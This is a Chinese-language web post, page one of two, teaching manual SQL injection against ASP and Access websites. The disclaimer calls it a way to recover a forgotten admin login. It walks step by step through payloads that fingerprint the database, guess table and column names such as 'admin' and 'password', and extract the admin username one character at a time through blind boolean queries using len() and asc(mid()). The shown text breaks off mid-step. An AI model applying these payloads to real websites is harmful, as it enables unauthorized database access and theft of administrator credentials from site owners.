游客

标题:关于ACCESS手工注入的技术-破解ACCESS数据库方法
正文:
ASP+accesss数据库架构的网站现在比比皆是，有时候我们处于各种目的，需要知道网站的数据库密码或者进入到网站的后台，但是我们没有记住或者忘记了后台登陆名和密码，这个就需要我们根据ACCESS数据库的规律来进行破解了。以下是一些破解思路，仅用来参考，不做非法目的倡导。　　1.and user>0 判断数据库类型(虽然刚才工具中已经判断出来了，但为了学习嘛，从最基本的来)看到回显中的Microsoft JET Database*** 错误我们可以断定是ACCESS数据库了　　2.and exists (select * from 表名) 猜解表名，返回错误说明表名不存在，返回正常说　　明表名存在　　这里我们输入 and exists (select * from admin)　　返回正常，说明我们输入的表明admin存在　　3.exists (select 列名 from 表名) 猜解列名，依然是返回错误说明列名不存在，返回　　正常说明列名存在　　这里我们输入　　and exists (select password from admin)　　and exists (select adminname from admin)　　返回正常，这样表名、列名就搞定了。　　4.and (select top 1 len(列名) from 表名)>x 猜解列的长度。x是数字，列的长度，返回错误说明正确列的长度就是x。变换top后的数字就可以猜解这个列的第N行长度了这里我们输入 and (select top 1 len(adminname) from admin)>8 8错误，7不错，说明8就是列的长度。　　5.and (select top 1 asc(mid(列名,列数N,1)) from 表名)>x 关键步骤，猜解列内容。　　top后的数字为该列的第N行，x为ASCII码，列数N就是在这一列中的第几个数字或字母。例如，x取50正常，100错误，80正常，一直提交到96正常，97就错误，说明其ASCII值为97这里我们输入：and (select top 1 asc(mid(adminname,1,1)) from admin)>50，50正常 150错误，125错，110正常，115正常，120错。118正常，119错误，说明第一位ASCI
[<<][[1]][2][>>]

查看评论(0)
发表评论



首页